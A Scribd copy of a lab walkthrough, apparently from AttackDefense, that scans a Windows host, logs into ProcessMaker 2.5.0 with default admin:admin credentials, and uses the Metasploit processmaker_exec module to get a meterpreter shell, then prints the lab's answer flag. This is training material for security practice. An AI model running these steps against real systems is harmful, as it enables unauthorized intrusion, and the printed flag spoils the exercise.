Scribd
Upload
5 views

Windows_Worflow_Platform

This document outlines the steps to exploit a vulnerable ProcessMaker application on a Windows platform. It includes commands for checking the target IP, running an Nmap scan, accessing the application, and exploiting a PHP Code Execution vulnerability using Metasploit. The final step reveals a flag obtained from the exploited application.

Uploaded by

leagueofleinad
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5 views

Windows_Worflow_Platform

This document outlines the steps to exploit a vulnerable ProcessMaker application on a Windows platform. It includes commands for checking the target IP, running an Nmap scan, accessing the application, and exploiting a PHP Code Execution vulnerability using Metasploit. The final step reveals a flag obtained from the exploited application.

Uploaded by

leagueofleinad
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Name Vulnerable Workflow Platform

URL https://attackdefense.com/challengedetails?cid=1946

Type Windows Exploitation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Checking target IP address.

Note: ​The target IP address is stored in the “target” file.

Command:​ cat /root/Desktop/target

Step 2:​ Run an Nmap scan against the target IP.

Command: ​nmap --top-ports 65536 10.0.0.168


Step 3: ​We have discovered that multiple ports are open. Access port 80 using firefox browser.

Command: ​firefox 10.0.0.168


Step 4: ​Target is running a ProcessMaker application. Login to the ProcessMaker application
using default ​admin:admin ​credentials.
Step 5: ​Go to admin → Settings → System Information to identify the version of the
ProcessMaker application.

The ProcessMaker version is 2.5.0.


Step 6: ​Search “processmaker 2.5.0 exploit” on google to find the vulnerability.

Step 6: ​Open Exploit-DB link: ​https://www.exploit-db.com/exploits/29325


Step 7: ​The target application is vulnerable to PHP Code Execution. We will use the metasploit
framework to exploit the vulnerability.

Commands:
msfconsole
search processmaker

use exploit/multi/http/processmaker_exec
set RHOSTS 10.0.0.168
exploit

We have successfully exploited the target ProcessMaker application and received a meterpreter
shell.

Step 5: ​Searching the flag.

Command: pwd
cd /
dir
cat flag.txt
This reveals the flag to us.

Flag: ​a3dcb4d229de6fde0db5686dee47145d

References

1. Process Maker (​https://www.processmaker.com/​)


2. Metasploit Module
(​https://www.rapid7.com/db/modules/exploit/multi/http/processmaker_exec​)

You might also like